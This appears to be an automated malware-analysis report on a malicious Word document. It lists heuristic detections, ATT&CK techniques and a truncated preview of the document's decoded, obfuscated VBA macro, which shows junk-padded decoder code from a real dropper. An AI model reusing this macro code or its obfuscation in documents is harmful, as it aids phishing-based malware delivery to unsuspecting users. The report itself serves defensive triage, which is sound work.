MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro, detected by multiple heuristics, is designed to execute code upon opening. The presence of CreateObject and the detection of obfuscated code suggest the macro is intended to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics 9
-
ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 86555 bytes |
SHA-256: 6fc883737334c65d0e08214177c98f2e995aae8e2dc548df9999d86ca3846a05 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BOrcFm"
Public Function jaV8Da7ShLvlFnqN(FDn1sCwz0dsCiQg As String, Optional qSzB3RbZEVvIRBW As Boolean = True) As String
Static mNi7QFlw6oojf7(0 To 255) As Byte
Dim RB9Rgc9blpqUE2 As Object
Dim sUMHumjboQav6y As Object
Dim jlJwnLV7lAU9() As Byte, uevdYX8JPV7uWYP() As Byte
Dim WbKa1MQDwJwVWK As String
Dim hirgQN45CHb As String
hirgQN45CHb = gIcA5pENbd6
WbKa1MQDwJwVWK = eOwPR0rk6mS
If (StrComp(WbKa1MQDwJwVWK, hirgQN45CHb, vbTextCompare) <> 0) Then
MsgBox ("Optional: dA4XqVbMfZC8OE.")
End If
Dim lRxVaB2mDG9tRcWgRF As Long, ERDZBL0lnmniHjs5 As Long
Dim aHQ61K3fW7Se7V As Object
If mNi7QFlw6oojf7(0) = 0 Then
Dim XY6j6HFZW5YDhh As Integer
For lRxVaB2mDG9tRcWgRF = 0 To 255
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF) = 255
Dim R19aKZar39f0PH As Integer
For w1zFeHBCa5j = 5 To 57
R19aKZar39f0PH = w1zFeHBCa5j
Next w1zFeHBCa5j
Next lRxVaB2mDG9tRcWgRF
Dim tezxL96XhuiVkM As Object
Dim XwsiFErZmeMnyG As Integer
For YRHmJgIHhFn = 8 To 86
XwsiFErZmeMnyG = YRHmJgIHhFn
Next YRHmJgIHhFn
For lRxVaB2mDG9tRcWgRF = 0 To 25
Dim WQxFMnc3UbwCSy As Integer
For AnwSBFTAI0Z = 4 To 43
WQxFMnc3UbwCSy = AnwSBFTAI0Z
Next AnwSBFTAI0Z
Dim NiLAqlTWdBK8hN As Integer
Dim t2jBCKUSEBb As String
NiLAqlTWdBK8hN = 9959
Dim tfYY9D8sBJv As Integer
t2jBCKUSEBb = Right(CStr(NiLAqlTWdBK8hN), 1)
tfYY9D8sBJv = CInt(t2jBCKUSEBb)
For LJbSyKzbyNW = tfYY9D8sBJv To 51
NiLAqlTWdBK8hN = NiLAqlTWdBK8hN + 3
Next LJbSyKzbyNW
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 65) = lRxVaB2mDG9tRcWgRF
Next lRxVaB2mDG9tRcWgRF
Dim aIYfkldwFGeSta, mJ4XcjCHcrr As String
aIYfkldwFGeSta = 2
mJ4XcjCHcrr = 1
#If aIYfkldwFGeSta > mJ4XcjCHcrr Then
Dim HsQY7spWOug As LongPtr
#Else
Dim HsQY7spWOug As Integer
HsQY7spWOug = 2 + 1
Dim XC5vYX0KNFX As Integer
For XC5vYX0KNFX = 0 To aIYfkldwFGeSta
XC5vYX0KNFX = XC5vYX0KNFX + 1
Next XC5vYX0KNFX
#End If
For lRxVaB2mDG9tRcWgRF = 26 To 51
Dim svOe2L9swYJ3gy As Object
Dim CM3i1FszViQRYZ, CCD3WjKQvw9 As Integer
CM3i1FszViQRYZ = 5
CCD3WjKQvw9 = 4
#If TYNcz7VYrOo <> 0 Then
TYNcz7VYrOo = TYNcz7VYrOo + 6
Dim brkdVALpmRu As Variant
Else
Dim brkdVALpmRu As Object
#End If
If CM3i1FszViQRYZ > CCD3WjKQvw9 Then
For PMWKiI3XwaHier = CCD3WjKQvw9 To CM3i1FszViQRYZ
CCD3WjKQvw9 = CCD3WjKQvw9 / CM3i1FszViQRYZ
Next PMWKiI3XwaHier
End If
Dim kmGAGmZNeUcOZI As String
Dim Fw0pnFrXEHx As String
Fw0pnFrXEHx = syPPpNrV602
kmGAGmZNeUcOZI = eeP5LqZWsJG
If (StrComp(kmGAGmZNeUcOZI, Fw0pnFrXEHx, vbTextCompare) <> 0) Then
MsgBox ("Optional: KMFXecAcUi9LPy.")
End If
mNi7QFlw6oojf7(lRxVaB2mDG9tRcWgRF + 71) = lRxVaB2mDG9tRcWgRF
Dim DuGbV0kgeMFzgY As String
DuGbV0kgeMFzgY = Application.UserName
Dim ai8v3kDak1R, scroJET6oJPJ7Y As Integer
scroJET6oJPJ7Y = Len(DuGbV0kgeMFzgY)
Dim UcaYHqEPRoe As Collection
While scroJET6oJPJ7Y > 9
ai8v3kDak1R = ai8v3kDak1R + 4
scroJET6oJPJ7Y = scroJET6oJPJ7Y - 9
Wend
Dim QzlzKa48Al4uqX, CXVrlzS97hd As Integer
QzlzKa48Al4uqX = 2
CXVrlzS97hd = 9
#If cVt8VLpQ1oF <> 0 Then
cVt8VLpQ1oF = cVt8VLpQ1oF + 6
Dim fSrPMZ4w3Xu As Variant
Else
Dim fSrPMZ4w3Xu As Object
#End If
If QzlzKa48Al4uqX > CXVrlzS97hd Then
For yqLTDD5KT0DTmE = CXVrlzS97hd To QzlzKa48Al4uqX
CXVrlzS97hd = CXVrlzS97hd / QzlzKa48Al4uqX
Next yqLTDD5KT0DTmE
End If
Next lRxVaB2mDG9tRcWgRF
Dim kNE4Lkexy9M2HT As Integer
Dim TvE4BaGkIvP As String
kNE4Lkexy9M2HT = 3279
Dim Y2MmDBvz1BM As Integer
TvE4BaGkIvP = Right(CStr(kNE4Lkexy9M2HT), 1)
Y2MmDBvz1BM = CInt(TvE4BaGkIvP)
For KIftvZ0ZA6k = Y2MmDBvz1BM To 33
kNE4Lkexy9M2HT = kNE4Lkexy9M2HT + 1
Next KIftvZ0ZA6k
For lRxVaB2mDG9tRcWgRF = 52 To 61
Dim qDkWUhV0o4a5oz As Integer
Dim txuCMmOY0uGy63 As String
Dim RXTiBrRXLh3 As String
RXTiBrRXLh3 = UXyDDvYqw09
txuCMmOY0uGy63 = YQGDnM2vYnk
If (StrComp(txuCMmOY0uGy63, RXTiBrRXLh3, vbTextCompare) <> 0) Then
MsgBox ("Optional:
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.